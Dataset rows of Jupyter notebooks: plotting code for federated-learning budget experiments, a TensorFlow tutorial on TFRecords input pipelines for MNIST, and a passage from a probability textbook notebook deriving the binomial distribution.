"_____no_output_____" ] ], [ [ "more budget-sufficient clients", "_____no_output_____" ] ], [ [ "agg = pd.concat([v for k, v in agg_df_dict.items()])\nagg = agg.reset_index()\nagg['avg 
test acc'] = agg['avg test acc'] * 100\nagg['MFLOPs'] = agg['GFLOPs'] * 1e3\nagg['method'] = agg['mode'].apply(lambda n: n if n != 'FedAvg' else 'Ind. FedAvg')\nagg['budgets'] = agg['slim_ratios'].apply(lambda n: (n.replace('d', '/')) if '-' in n else n)\nagg = agg[agg['slim_ratios'].apply(lambda n: 'd' not in n)]\n\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.lineplot(data=agg, x='width', y='avg test acc', marker='o', style='method', hue='budgets',\n style_order=['Ind. FedAvg', 'SplitMix', 'SHeteroFL'], palette=cmap[:len(agg['budgets'].unique())])\nax.set(xticks=agg['width'].unique(), ylabel='average test accuracy (%)',\n xlabel='width (%)')\n# ax.set(xlim=(None, 200))\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\nax.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'vary_budget_dist_skew.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ], [ "fig, ax = plt.subplots(1, 1, figsize=(4,3))\ndf = agg[np.isin(agg['budgets'], ['8-4-2-1', 'w/o constraint'])]\n# df = df[np.isin(df['method'], ['Ind. FedAvg', 'SHeteroFL'])]\nsns.lineplot(data=df, x='width', y='avg test acc', marker='o', style='method', # hue='budgets',\n# style_order=['Ind. 
FedAvg', 'SplitMix', 'SHeteroFL'], # palette=cmap[:len(df['budgets'].unique())]\n )\nax.set(xticks=df['width'].unique(), ylabel='average test accuracy (%)', xlabel='width (%)')\nax.set(ylim=(81, 90.2))\n# ax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\n# ax.legend('')\nax.grid(True)", "_____no_output_____" ], [ "df_dict = defaultdict(list)\nfor slim_ratio in agg['slim_ratios']:\n if slim_ratio != 'w/o constraint':\n slim_ratios = get_slimmabe_ratios(slim_ratio)\n df_dict['group'].extend([1,2,3,4])\n df_dict['width constraint'].extend(slim_ratios)\n df_dict['budgets'].extend([slim_ratio]*len(slim_ratios))\ndf = pd.DataFrame(df_dict)\n# df\n\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.barplot(data=df, x='group', y='width constraint', hue='budgets', \n palette=cmap[1:len(agg['budgets'].unique())])\nplt.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'budget_dist_skew.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ], [ "df_ = df[df['budgets'] == '8-4-2-1']\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.barplot(data=df_, x='group', y='width constraint', hue='budgets')\nplt.grid(True)", "_____no_output_____" ] ], [ [ "step-increase budgets", "_____no_output_____" ] ], [ [ "agg = pd.concat([v for k, v in agg_df_dict.items()])\nagg = agg.reset_index()\nagg['avg test acc'] = agg['avg test acc'] * 100\nagg['MFLOPs'] = agg['GFLOPs'] * 1e3\nagg['method'] = agg['mode'].apply(lambda n: n if n != 'FedAvg' else 'Ind. FedAvg')\nagg['budgets'] = agg['slim_ratios'].apply(lambda n: (n.replace('d', '/')) if '-' in n else n)\nagg = agg[agg['budgets'].apply(lambda n: '/' in n)]\n\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.lineplot(data=agg, x='width', y='avg test acc', marker='o', style='method', hue='budgets',\n style_order=['Ind. 
FedAvg', 'SplitMix', 'SHeteroFL'])\nax.set(xticks=agg['width'].unique(), ylabel='average test accuracy (%)', ylim=(77.5, None))\nax.set(xlabel='width (%)')\nax.legend(loc='center left', bbox_to_anchor=(1, 0.5))\nax.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'vary_budget_dist_step.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ], [ "df_dict = defaultdict(list)\nfor slim_ratio in agg['slim_ratios']:\n if slim_ratio != 'w/o constraint':\n slim_ratios = get_slimmabe_ratios(slim_ratio)\n df_dict['group'].extend([1,2,3,4])\n df_dict['width constraint'].extend(slim_ratios)\n df_dict['budgets'].extend([slim_ratio]*len(slim_ratios))\ndf = pd.DataFrame(df_dict)\n# df\n\nfig, ax = plt.subplots(1, 1, figsize=(5,3))\nsns.barplot(data=df, x='group', y='width constraint', hue='budgets')\nplt.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'budget_dist_step.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ] ], [ [ "log normal budget distribution", "_____no_output_____" ] ], [ [ "ln_agg_df_dict = {}\nfor mode in ['SplitMix ln', 'HeteroFL ln']:\n # 'SplitMix step=0.25 non-exp'\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n print(f\"mode: {mode}\")\n api = wandb.Api()\n sweep = api.sweep(sweep_dict[mode])\n\n df_dict = fetch_config_summary(\n sweep.runs,\n config_keys = ['test_slim_ratio', 'slim_ratios'], \n summary_keys = ['avg test acc', 'GFLOPs', 'model size (MB)']\n )\n df = pd.DataFrame(df_dict)\n df['mode'] = mode.split(' ')[0]\n df['test_slim_ratio'] = df['test_slim_ratio'] * 100\n df['width'] = df['test_slim_ratio']\n df = df[df['slim_ratios'] != '8-4-2-1']\n ln_agg_df_dict[mode] = df\nln_agg_df_dict['FedAvg'] = agg_df_dict['FedAvg']", "_____no_output_____" ], [ "agg = pd.concat([v for k, v in ln_agg_df_dict.items()])\nagg = agg.reset_index()\nagg['avg test acc'] = agg['avg test acc'] * 
100\nagg['method'] = agg['mode'].apply(lambda n: n if n != 'FedAvg' else 'Ind. FedAvg')\n\nfig, ax = plt.subplots(1, 1, figsize=(4,3))\nsns.lineplot(data=agg, x='width', y='avg test acc', marker='o', style='method', #hue='budgets',\n style_order=['Ind. FedAvg', 'SplitMix', 'HeteroFL'])\nax.set(xticks=agg['width'].unique(), ylabel='average test accuracy (%)', ylim=(65, None),\n xlabel='width (%)')\nax.grid(True)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'vary_budget_dist_ln.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ], [ "def get_slim_ratio_schedule(train_slim_ratios: list, mode: str, client_num):\n if mode.startswith('ln'): # lognorm\n ws = sorted(train_slim_ratios)\n min_w = min(train_slim_ratios)\n from scipy.stats import lognorm\n s, scale = [float(v) for v in mode[len('ln'):].split('_')]\n rv = lognorm(s=s, scale=scale)\n print(ws)\n cdfs = [rv.cdf(w) for w in ws] + [1.]\n print(cdfs)\n qs = [c - rv.cdf(min_w) for c in cdfs]\n r = (qs[-1]-qs[0])\n qs = [int(client_num * (q-qs[0]) / r) for q in qs]\n print(qs)\n slim_ratios = np.zeros(client_num)\n for i in range(len(qs)-1):\n slim_ratios[qs[i]:qs[i+1]] = ws[i]\n return slim_ratios\nget_slim_ratio_schedule(np.arange(0.125, 1.+0.125, 0.125), 'ln0.5_0.4', 50)", "_____no_output_____" ], [ "sch = get_slim_ratio_schedule(np.arange(0.125, 1.+0.125, 0.125), 'ln0.5_0.4', 50)\nbudgets, cnts = np.unique(sch, return_counts=True)\nprint(budgets, cnts)\n\nfig, ax = plt.subplots(1, 1, figsize=(4,3))\nax.bar(x=budgets, height=cnts, width=[0.125]*len(budgets), align='center')\n\nax.grid(True)\nax.set(xlabel='budget (maximal compatible width)', ylabel='number of clients')\nax.set_xticks(budgets)\nax.set_xticklabels(budgets)\n\nplt.tight_layout()\nout_file = os.path.join(cache_path, f'digits_budget_dist_ln0.5_0.4.pdf')\nprint(f\"save fig => {out_file}\")\nplt.savefig(out_file)\n\nplt.show()", "_____no_output_____" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code", "code", "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ], [ "markdown" ], [ "code", "code" ], [ "markdown" ], [ "code", "code", "code", "code" ] ]
e72d4b660cd2d89ed123d41cbaa769b747a90818
39,550
ipynb
Jupyter Notebook
code/model_zoo/tensorflow_ipynb/tfrecords.ipynb
wpsliu123/Sebastian_Raschka-Deep-Learning-Book
fc57a58b46921f057248bd8fd0f258e952a3cddb
[ "MIT" ]
3
2019-02-19T16:42:28.000Z
2020-10-11T05:16:12.000Z
code/model_zoo/tensorflow_ipynb/tfrecords.ipynb
bharat3012/deep-learning-book
839e076c5098084512c947a38878a9a545d9a87d
[ "MIT" ]
null
null
null
code/model_zoo/tensorflow_ipynb/tfrecords.ipynb
bharat3012/deep-learning-book
839e076c5098084512c947a38878a9a545d9a87d
[ "MIT" ]
2
2020-09-07T12:43:33.000Z
2021-06-11T12:10:09.000Z
54.854369
6,822
0.685917
[ [ [ "*Accompanying code examples of the book \"Introduction to Artificial Neural Networks and Deep Learning: A Practical Guide with Applications in Python\" by [Sebastian Raschka](https://sebastianraschka.com). All code examples are released under the [MIT license](https://github.com/rasbt/deep-learning-book/blob/master/LICENSE). If you find this content useful, please consider supporting the work by buying a [copy of the book](https://leanpub.com/ann-and-deeplearning).*\n \nOther code examples and content are available on [GitHub](https://github.com/rasbt/deep-learning-book). The PDF and ebook versions of the book are available through [Leanpub](https://leanpub.com/ann-and-deeplearning).", "_____no_output_____" ] ], [ [ "%load_ext watermark\n%watermark -a 'Sebastian Raschka' -v -p tensorflow,numpy", "Sebastian Raschka \n\nCPython 3.6.1\nIPython 6.1.0\n\ntensorflow 1.1.0\nnumpy 1.12.1\n" ] ], [ [ "# Using Input Pipelines to Read Data from TFRecords Files", "_____no_output_____" ], [ "TensorFlow provides users with multiple options for providing data to the model. One of the probably most common methods is to define placeholders in the TensorFlow graph and feed the data from the current Python session into the TensorFlow `Session` using the `feed_dict` parameter. 
Using this approach, a large dataset that does not fit into memory is most conveniently and efficiently stored using NumPy archives as explained in [Chunking an Image Dataset for Minibatch Training using NumPy NPZ Archives](image-data-chunking-npz.ipynb) or HDF5 data base files ([Storing an Image Dataset for Minibatch Training using HDF5](image-data-chunking-hdf5.ipynb)).\n\nAnother approach, which is often preferred when it comes to computational efficiency, is to do the \"data loading\" directly in the graph using input queues from so-called TFRecords files, which will be illustrated in this notebook.\n\nBeyond the examples in this notebook, you are encouraged to read more in TensorFlow's \"[Reading Data](https://www.tensorflow.org/programmers_guide/reading_data)\" guide.", "_____no_output_____" ], [ "## 0. The Dataset", "_____no_output_____" ], [ "Let's pretend we have a directory of images containing two subdirectories with images for training, validation, and testing. The following function will create such a dataset of images in JPEG format locally for demonstration purposes.", "_____no_output_____" ] ], [ [ "# Note that executing the following code \n# cell will download the MNIST dataset\n# and save all the 60,000 images as separate JPEG\n# files. This might take a few minutes depending\n# on your machine.\n\nimport numpy as np\nfrom helper import mnist_export_to_jpg\n\nnp.random.seed(123)\nmnist_export_to_jpg(path='./')", "Extracting ./train-images-idx3-ubyte.gz\nExtracting ./train-labels-idx1-ubyte.gz\nExtracting ./t10k-images-idx3-ubyte.gz\nExtracting ./t10k-labels-idx1-ubyte.gz\n" ] ], [ [ "The `mnist_export_to_jpg` function called above creates 3 directories, mnist_train, mnist_test, and mnist_validation. 
Note that the names of the subdirectories correspond directly to the class label of the images that are stored under it:", "_____no_output_____" ] ], [ [ "import os\n\nfor i in ('train', 'valid', 'test'): \n dirs = [d for d in os.listdir('mnist_%s' % i) if not d.startswith('.')]\n print('mnist_%s subdirectories' % i, dirs)", "mnist_train subdirectories ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nmnist_valid subdirectories ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\nmnist_test subdirectories ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n" ] ], [ [ "To make sure that the images look okay, the snippet below plots an example image from the subdirectory `mnist_train/9/`:", "_____no_output_____" ] ], [ [ "%matplotlib inline\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport os\n\nsome_img = os.path.join('./mnist_train/9/', os.listdir('./mnist_train/9/')[0])\n\nimg = mpimg.imread(some_img)\nprint(img.shape)\nplt.imshow(img, cmap='binary');", "(28, 28)\n" ] ], [ [ "Note: The JPEG format introduces a few artifacts that we can see in the image above. In this case, we use JPEG instead of PNG. Here, JPEG is used for demonstration purposes since that's still format many image datasets are stored in.", "_____no_output_____" ], [ "## 1. Saving images as TFRecords files", "_____no_output_____" ], [ "First, we are going to convert the images into a binary TFRecords file, which is based on Google's [protocol buffer](https://developers.google.com/protocol-buffers/) format:\n\n> The recommended format for TensorFlow is a TFRecords file containing tf.train.Example protocol buffers (which contain Features as a field). You write a little program that gets your data, stuffs it in an Example protocol buffer, serializes the protocol buffer to a string, and then writes the string to a TFRecords file using the tf.python_io.TFRecordWriter. 
For example, tensorflow/examples/how_tos/reading_data/convert_to_records.py converts MNIST data to this format. \n\n> [ Excerpt from https://www.tensorflow.org/programmers_guide/reading_data ]\n\n", "_____no_output_____" ] ], [ [ "import glob\nimport numpy as np\nimport tensorflow as tf\n\n\ndef images_to_tfrecords(data_stempath='./mnist_',\n shuffle=False, \n random_seed=None):\n \n def int64_to_feature(value):\n return tf.train.Feature(int64_list=tf.train.Int64List(value=value))\n \n for s in ['train', 'valid', 'test']:\n\n with tf.python_io.TFRecordWriter('mnist_%s.tfrecords' % s) as writer:\n\n img_paths = np.array([p for p in glob.iglob('%s%s/**/*.jpg' % \n (data_stempath, s), \n recursive=True)])\n\n if shuffle:\n rng = np.random.RandomState(random_seed)\n rng.shuffle(img_paths)\n\n for idx, path in enumerate(img_paths):\n label = int(os.path.basename(os.path.dirname(path)))\n image = mpimg.imread(path)\n image = image.reshape(-1).tolist()\n\n\n example = tf.train.Example(features=tf.train.Features(feature={\n 'image': int64_to_feature(image),\n 'label': int64_to_feature([label])}))\n\n writer.write(example.SerializeToString())", "_____no_output_____" ] ], [ [ "Note that it is important to shuffle the dataset so that we can later make use of TensorFlow's [`tf.train.shuffle_batch`](https://www.tensorflow.org/api_docs/python/tf/train/shuffle_batch) function and don't need to load the whole dataset into memory to shuffle epochs.", "_____no_output_____" ] ], [ [ "images_to_tfrecords(shuffle=True, random_seed=123)", "_____no_output_____" ] ], [ [ "Just to make sure that the images were serialized correctly, let us load an image back from TFRecords using the [`tf.python_io.tf_record_iterator`](https://www.tensorflow.org/api_docs/python/tf/python_io/tf_record_iterator) and display it:", "_____no_output_____" ] ], [ [ "import tensorflow as tf\nimport numpy as np\n\n\nrecord_iterator = tf.python_io.tf_record_iterator(path='mnist_train.tfrecords')\n\nfor r in 
record_iterator:\n example = tf.train.Example()\n example.ParseFromString(r)\n \n label = example.features.feature['label'].int64_list.value[0]\n print('Label:', label)\n img = np.array(example.features.feature['image'].int64_list.value)\n img = img.reshape((28, 28))\n plt.imshow(img, cmap='binary')\n plt.show\n break", "Label: 2\n" ] ], [ [ "So far so good, the image above looks okay. In the next secction, we will introduce a slightly different approach for loading the images, namely, the [`TFRecordReader`](https://www.tensorflow.org/api_docs/python/tf/TFRecordReader), which we need to load images inside a TensorFlow graph.", "_____no_output_____" ], [ "## 2. Loading images via the TFRecordReader", "_____no_output_____" ], [ "Roughly speaking, we can regard the [`TFRecordReader`](https://www.tensorflow.org/api_docs/python/tf/TFRecordReader) as a class that let's us load images \"symbolically\" inside a TensorFlow graph. A `TFRecordReader` uses the state in the graph to remember the location of a `.tfrecord` file that it reads and lets us iterate over training examples and batches after initializing the graph as we will see later.\n\nTo see how it works, let's start with a simple function that reads one image at a time:", "_____no_output_____" ] ], [ [ "def read_one_image(tfrecords_queue, normalize=True):\n\n reader = tf.TFRecordReader()\n key, value = reader.read(tfrecords_queue)\n features = tf.parse_single_example(value,\n features={'label': tf.FixedLenFeature([], tf.int64),\n 'image': tf.FixedLenFeature([784], tf.int64)})\n label = tf.cast(features['label'], tf.int32)\n image = tf.cast(features['image'], tf.float32)\n onehot_label = tf.one_hot(indices=label, depth=10)\n \n if normalize:\n # normalize to [0, 1] range\n image = image / 255.\n \n return onehot_label, image", "_____no_output_____" ] ], [ [ "To use this `read_one_image` function to fetch images in a TensorFlow session, we will make use of queue runners as illustrated in the following example:", 
"_____no_output_____" ] ], [ [ "g = tf.Graph()\nwith g.as_default():\n \n queue = tf.train.string_input_producer(['mnist_train.tfrecords'], \n num_epochs=10)\n label, image = read_one_image(queue)\n\n\nwith tf.Session(graph=g) as sess:\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n \n for i in range(10):\n one_label, one_image = sess.run([label, image])\n \n print('Label:', one_label, '\\nImage dimensions:', one_image.shape)\n \n coord.request_stop()\n coord.join(threads)", "Label: [ 0. 0. 0. 0. 0. 0. 0. 1. 0. 0.] \nImage dimensions: (784,)\n" ] ], [ [ "- The `tf.train.string_input_producer` produces a filename queue that we iterate over in the session. Note that we need to call `sess.run(tf.local_variables_initializer())` if we define a fixed number of `num_epochs` in `tf.train.string_input_producer`. Alternatively, `num_epochs` can be set to `None` to iterate \"infinitely.\" \n\n- The `tf.train.start_queue_runners` function uses a queue runner that uses a separate thread to load the filenames from the `queue` that we defined in the graph without blocking the reader.", "_____no_output_____" ], [ "However, we rarely (want to) train neural networks with one datapoint at a time but use minibatches instead. TensorFlow also has some really convenient utility functions to do the batching conveniently. 
In the following code example, we will use the [`tf.train.shuffle_batch`](https://www.tensorflow.org/api_docs/python/tf/train/shuffle_batch) function to load the images and labels in batches of size 64:", "_____no_output_____" ] ], [ [ "g = tf.Graph()\nwith g.as_default():\n \n queue = tf.train.string_input_producer(['mnist_train.tfrecords'], \n num_epochs=10)\n label, image = read_one_image(queue)\n \n \n label_batch, image_batch = tf.train.shuffle_batch([label, image], \n batch_size=64,\n capacity=5000,\n min_after_dequeue=2000,\n num_threads=8,\n seed=123)\n\nwith tf.Session(graph=g) as sess:\n sess.run(tf.local_variables_initializer())\n sess.run(tf.global_variables_initializer())\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n \n for i in range(10):\n many_labels, many_images = sess.run([label_batch, image_batch])\n \n print('Batch size:', many_labels.shape[0])\n \n coord.request_stop()\n coord.join(threads)", "Batch size: 64\n" ] ], [ [ "The other relevant arguments we provided to `tf.train.shuffle_batch` are described below:\n\n- `capacity`: An integer that defines the maximum number of elements in the queue.\n- `min_after_dequeue`: The minimum number elements in the queue after a dequeue, which is used to ensure that a minimum number of data points have been loaded for shuffling.\n- `num_threads`: The number of threads for enqueuing.\n", "_____no_output_____" ], [ "## 3. 
Use queue runners to train a neural network", "_____no_output_____" ], [ "In this section, we will take the concepts that were introduced in the previous sections and train a multilayer perceptron from the `'mnist_train.tfrecords'` file:\n ", "_____no_output_____" ] ], [ [ "##########################\n### SETTINGS\n##########################\n\n# Hyperparameters\nlearning_rate = 0.1\nbatch_size = 128\nn_epochs = 15\nn_iter = n_epochs * (45000 // batch_size)\n\n# Architecture\nn_hidden_1 = 128\nn_hidden_2 = 256\nheight, width = 28, 28\nn_classes = 10\n\n\n\n##########################\n### GRAPH DEFINITION\n##########################\n\ng = tf.Graph()\nwith g.as_default():\n \n tf.set_random_seed(123)\n\n # Input data\n queue = tf.train.string_input_producer(['mnist_train.tfrecords'], \n num_epochs=None)\n label, image = read_one_image(queue)\n \n label_batch, image_batch = tf.train.shuffle_batch([label, image], \n batch_size=batch_size,\n seed=123,\n num_threads=8,\n capacity=5000,\n min_after_dequeue=2000)\n \n tf_images = tf.placeholder_with_default(image_batch,\n shape=[None, 784], \n name='images')\n tf_labels = tf.placeholder_with_default(label_batch, \n shape=[None, 10], \n name='labels')\n\n # Model parameters\n weights = {\n 'h1': tf.Variable(tf.truncated_normal([height*width, n_hidden_1], stddev=0.1)),\n 'h2': tf.Variable(tf.truncated_normal([n_hidden_1, n_hidden_2], stddev=0.1)),\n 'out': tf.Variable(tf.truncated_normal([n_hidden_2, n_classes], stddev=0.1))\n }\n biases = {\n 'b1': tf.Variable(tf.zeros([n_hidden_1])),\n 'b2': tf.Variable(tf.zeros([n_hidden_2])),\n 'out': tf.Variable(tf.zeros([n_classes]))\n }\n\n # Multilayer perceptron\n layer_1 = tf.add(tf.matmul(tf_images, weights['h1']), biases['b1'])\n layer_1 = tf.nn.relu(layer_1)\n layer_2 = tf.add(tf.matmul(layer_1, weights['h2']), biases['b2'])\n layer_2 = tf.nn.relu(layer_2)\n out_layer = tf.matmul(layer_2, weights['out']) + biases['out']\n\n # Loss and optimizer\n loss = 
tf.nn.softmax_cross_entropy_with_logits(logits=out_layer, labels=tf_labels)\n cost = tf.reduce_mean(loss, name='cost')\n optimizer = tf.train.GradientDescentOptimizer(learning_rate=learning_rate)\n train = optimizer.minimize(cost, name='train')\n\n # Prediction\n prediction = tf.argmax(out_layer, 1, name='prediction')\n correct_prediction = tf.equal(tf.argmax(label_batch, 1), tf.argmax(out_layer, 1))\n accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32), name='accuracy')\n \n \n \nwith tf.Session(graph=g) as sess:\n sess.run(tf.global_variables_initializer())\n saver0 = tf.train.Saver()\n \n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n \n avg_cost = 0.\n iter_per_epoch = n_iter // n_epochs\n epoch = 0\n\n for i in range(n_iter):\n _, cost = sess.run(['train', 'cost:0'])\n avg_cost += cost\n \n if not i % iter_per_epoch:\n epoch += 1\n avg_cost /= iter_per_epoch\n print(\"Epoch: %03d | AvgCost: %.3f\" % (epoch, avg_cost))\n avg_cost = 0.\n \n \n coord.request_stop()\n coord.join(threads)\n \n saver0.save(sess, save_path='./mlp')", "Epoch: 001 | AvgCost: 0.007\nEpoch: 002 | AvgCost: 0.469\nEpoch: 003 | AvgCost: 0.240\nEpoch: 004 | AvgCost: 0.183\nEpoch: 005 | AvgCost: 0.151\nEpoch: 006 | AvgCost: 0.128\nEpoch: 007 | AvgCost: 0.110\nEpoch: 008 | AvgCost: 0.099\nEpoch: 009 | AvgCost: 0.087\nEpoch: 010 | AvgCost: 0.078\nEpoch: 011 | AvgCost: 0.070\nEpoch: 012 | AvgCost: 0.063\nEpoch: 013 | AvgCost: 0.058\nEpoch: 014 | AvgCost: 0.051\nEpoch: 015 | AvgCost: 0.047\n" ] ], [ [ "After looking at the graph above, you probably wondered why we used [`tf.placeholder_with_default`](https://www.tensorflow.org/api_docs/python/tf/placeholder_with_default) to define the two placeholders:\n\n```python\ntf_images = tf.placeholder_with_default(image_batch,\n shape=[None, 784], \n name='images')\ntf_labels = tf.placeholder_with_default(label_batch, \n shape=[None, 10], \n name='labels')\n``` \n\nIn the training session 
above, these placeholders are being ignored if we don't feed them via a session's `feed_dict`, or in other words \"[A `tf.placeholder_with_default` is a] placeholder op that passes through input when its output is not fed\" (https://www.tensorflow.org/api_docs/python/tf/placeholder_with_default).\n\nHowever, these placeholders are useful if we want to feed new data to the graph and make predictions after training as in a real-world application, which we will see in the next section.", "_____no_output_____" ], [ "## 4. Feeding new datapoints through placeholders", "_____no_output_____" ], [ "To demonstrate how we can feed new data points to the network that are not part of the `mnist_train.tfrecords` file, let's use the test dataset and load the images into Python and pass it to the graph using a `feed_dict`:", "_____no_output_____" ] ], [ [ "record_iterator = tf.python_io.tf_record_iterator(path='mnist_test.tfrecords')\n\nwith tf.Session() as sess:\n \n saver1 = tf.train.import_meta_graph('./mlp.meta')\n saver1.restore(sess, save_path='./mlp')\n \n num_correct = 0\n for idx, r in enumerate(record_iterator):\n example = tf.train.Example()\n example.ParseFromString(r)\n label = example.features.feature['label'].int64_list.value[0]\n image = np.array(example.features.feature['image'].int64_list.value)\n \n pred = sess.run('prediction:0', \n feed_dict={'images:0': image.reshape(1, 784)})\n\n num_correct += int(label == pred[0])\n acc = num_correct / (idx + 1) * 100\n\nprint('Test accuracy: %.1f%%' % acc)", "INFO:tensorflow:Restoring parameters from ./mlp\nTest accuracy: 97.3%\n" ] ] ]
[ "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code", "markdown", "code" ]
[ [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown" ], [ "code" ], [ "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ], [ "markdown", "markdown", "markdown" ], [ "code" ] ]
e72d567c7bd53da5e428eefec46b37d66561f05d
57,255
ipynb
Jupyter Notebook
notebooks/Chapter_06/01_Binomial_Distribution.ipynb
choldgraf/prob140
0750fc62fb114220035278ed2161e4b82ddca15f
[ "MIT" ]
null
null
null
notebooks/Chapter_06/01_Binomial_Distribution.ipynb
choldgraf/prob140
0750fc62fb114220035278ed2161e4b82ddca15f
[ "MIT" ]
null
null
null
notebooks/Chapter_06/01_Binomial_Distribution.ipynb
choldgraf/prob140
0750fc62fb114220035278ed2161e4b82ddca15f
[ "MIT" ]
null
null
null
129.829932
10,882
0.861252
[ [ [ "# HIDDEN\nfrom datascience import *\nfrom prob140 import *\nimport numpy as np\nimport matplotlib.pyplot as plt\nplt.style.use('fivethirtyeight')\n%matplotlib inline\nimport math\nfrom scipy import stats", "_____no_output_____" ] ], [ [ "## The Binomial Distribution ##", "_____no_output_____" ], [ "Let $X_1, X_2, \\ldots , X_n$ be i.i.d. Bernoulli $(p)$ random variables and let $S_n = X_1 + X_2 \\ldots + X_n$. That's a formal way of saying:\n- Suppose you have a fixed number $n$ of success/failure trials; and\n- the trials are independent; and\n- on each trial, the probability of success is $p$.\n- Let $S_n$ be the total number of successes.\n\nThe first goal of this section is to find the distribution of $S_n$. \n\nIn the example that we fixed our minds on earlier, we are counting the number of sixes in 7 rolls of a die. The 7 rolls are independent of each other, the chance of \"success\" (getting a six) is $1/6$ on each trial, and $S_7$ is the number of sixes.\n\nThe first step in finding the distribution of any random variable is to identify the possible values of the variable. In $n$ trials, the smallest number of successes you can have is 0 and the largest is $n$. So the set of possible values of $S_n$ is $\\{0, 1, 2, \\ldots , n\\}$.\n\nThus the number of sixes in 7 rolls can be any integer in the 0 through 7 range. Let's find $P(S_7 = 3)$.\n\nPartition the event $\\{S_7 = 3\\}$ into the different ways it can happen. One way can be denoted SSSFFFF, where S denotes \"success\" (or \"six\"), and F denotes failure. Another is SFFSSFF. And so on.\n\nNow notice that \n\n$$\nP(\\text{SSSFFFF}) = \n\\big{(}\\frac{1}{6}\\big{)}^3 \\big{(}\\frac{5}{6}\\big{)}^4\n= P(\\text{SFFSSFF})\n$$\nby independence. Indeed, any sequence of three S's and four F's has the same probability. 
So by the addition rule,\n\n\\begin{align*}\nP(S_7 = 3) &= \\text{(number of sequences that have three S and four F)} \\cdot \\big{(}\\frac{1}{6}\\big{)}^3 \\big{(}\\frac{5}{6}\\big{)}^4 \\\\ \\\\\n&= \\binom{7}{3} \\big{(}\\frac{1}{6}\\big{)}^3 \\big{(}\\frac{5}{6}\\big{)}^4\n\\end{align*}\n\nbecause $\\binom{7}{3}$ counts the number of ways you can choose 3 places out of 7 in which to put the symbol S, with the remaining 4 places being filled with F.\n\nAn analogous argument leads us to one of the most important distributions in probability theory.", "_____no_output_____" ], [ "### The Binomial $(n, p)$ Distribution ###\nLet $S_n$ be the number of successes in $n$ independent Bernoulli $(p)$ trials. Then $S_n$ has the *binomial distribution with parameters $n$ and $p$*, defined by\n\n$$\nP(S_n = k) = \\binom{n}{k} p^k (1-p)^{n-k}, ~~~ k = 0, 1, \\ldots, n\n$$\n\nParameters of a distribution are constants associated with it. The Bernoulli $(p)$ distribution has parameter $p$. The binomial distribution defined above has parameters $n$ and $p$ and is referred to as the binomial $(n, p)$ distribution for short. You should check that the Bernoulli $(p)$ distribution is the same as the binomial $(1, p)$ distribution.\n\nBefore we get going on calculations with the binomial distribution, let's make a few observations.\n\n- The functional form of the probabilities is symmetric in successes and failures, because\n\n$$\nP(S_n = k) = \\frac{n!}{k!(n-k)!} p^k (1-p)^{n-k}, ~~~ k = 0, 1, \\ldots, n\n$$\n\nThat's \"number of trials factorial; divided by number of successes factorial times number of failures factorial; times the probability of success to the power number of successes; times the probability of failure to the power number of failures.\"\n\n- The formula makes sense for the edge cases $k=0$ and $k=n$. We can calculate $P(S_n = 0)$ without any of the machinery developed above. It's the chance of no successes, which is the chance of all failures, which is $(1-p)^n$. 
